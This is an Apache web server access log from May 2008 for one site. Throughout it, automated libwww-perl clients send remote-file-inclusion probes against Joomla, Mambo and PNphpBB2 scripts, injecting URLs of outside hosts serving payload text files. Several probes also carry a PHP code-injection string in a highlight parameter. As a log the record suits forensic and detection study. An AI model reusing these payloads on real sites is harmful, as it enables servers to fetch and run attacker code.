209.190.24.146 - - [28/May/2008:11:30:27 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:11:30:31 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:11:30:32 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:30:40 -0700] "GET /logs/access_080312.log/start.php?id=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:30:40 -0700] "GET /logs/access_080312.log/start.php?id=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:30:40 -0700] "GET /start.php?id=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:30:40 -0700] "GET /start.php?id=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:30:40 -0700] "GET /logs/start.php?id=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:30:40 -0700] "GET /logs/start.php?id=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:31:02 -0700] "GET /logs/access.log/start.php?id=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:31:02 -0700] "GET /logs/access.log/start.php?id=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:31:34 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:31:37 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:11:31:50 -0700] "GET /logs/access_080327.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.67.59 - - [28/May/2008:11:31:52 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.59 - - [28/May/2008:11:31:52 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:31:52 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:31:54 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:31:54 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:11:32:02 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:11:32:05 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:11:32:05 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:32:10 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:32:10 -0700] "GET /modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:32:11 -0700] "GET /logs/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:32:11 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:32:20 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:32:20 -0700] "GET /modifyform.html?code=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:32:20 -0700] "GET /logs/modifyform.html?code=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:32:21 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:32:25 -0700] "GET /logs//index.php?incl=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:32:26 -0700] "GET //index.php?incl=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
67.205.96.205 - - [28/May/2008:11:32:27 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.drcts.co.kr/rgboard/data/notice/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [28/May/2008:11:32:27 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.drcts.co.kr/rgboard/data/notice/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [28/May/2008:11:32:27 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.drcts.co.kr/rgboard/data/notice/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:32:30 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:32:30 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:32:31 -0700] "GET /modifyform.html?code=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:32:31 -0700] "GET /modifyform.html?code=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:32:31 -0700] "GET /logs/modifyform.html?code=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:32:31 -0700] "GET /logs/modifyform.html?code=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.57.150.97 - - [28/May/2008:11:32:31 -0700] "GET /logs/access_080103.log//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.fingerxs.eu/modules/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:32:31 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:32:31 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.57.150.97 - - [28/May/2008:11:32:31 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.fingerxs.eu/modules/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.57.150.97 - - [28/May/2008:11:32:32 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.fingerxs.eu/modules/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:11:32:37 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:11:32:37 -0700] "GET /modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:11:32:37 -0700] "GET /logs/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:11:32:37 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:32:40 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:32:41 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:11:32:42 -0700] "GET /logs/access_071225.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:11:32:42 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [28/May/2008:11:32:42 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:32:42 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:32:42 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:32:43 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:32:43 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:32:46 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:32:47 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:32:48 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:32:56 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:32:58 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:32:58 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:33:02 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:33:02 -0700] "GET /modifyform.html?code=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:33:02 -0700] "GET /logs/modifyform.html?code=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:33:02 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:33:11 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:33:12 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:33:14 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:33:14 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:11:33:22 -0700] "GET /logs/admin.php?include_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:11:33:23 -0700] "GET /admin.php?include_path=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:33:32 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.65.154 - - [28/May/2008:11:33:33 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:33:34 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:33:34 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:33:36 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:33:37 -0700] "GET /logs/access_080228.log/show.php?page=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:33:37 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:33:37 -0700] "GET /show.php?page=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:33:38 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:33:38 -0700] "GET /logs/show.php?page=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:33:39 -0700] "GET /logs/access_080228.log/show.php?page=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:33:40 -0700] "GET /show.php?page=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:33:40 -0700] "GET /logs/show.php?page=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:34:00 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:34:00 -0700] "GET /modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:34:00 -0700] "GET /logs/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:34:00 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:34:01 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:34:07 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:34:09 -0700] "GET //ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:34:10 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:34:24 -0700] "GET /logs/access_080131.log/show.php?page=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:34:24 -0700] "GET /logs/access_080131.log/show.php?page=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:34:51 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:34:52 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
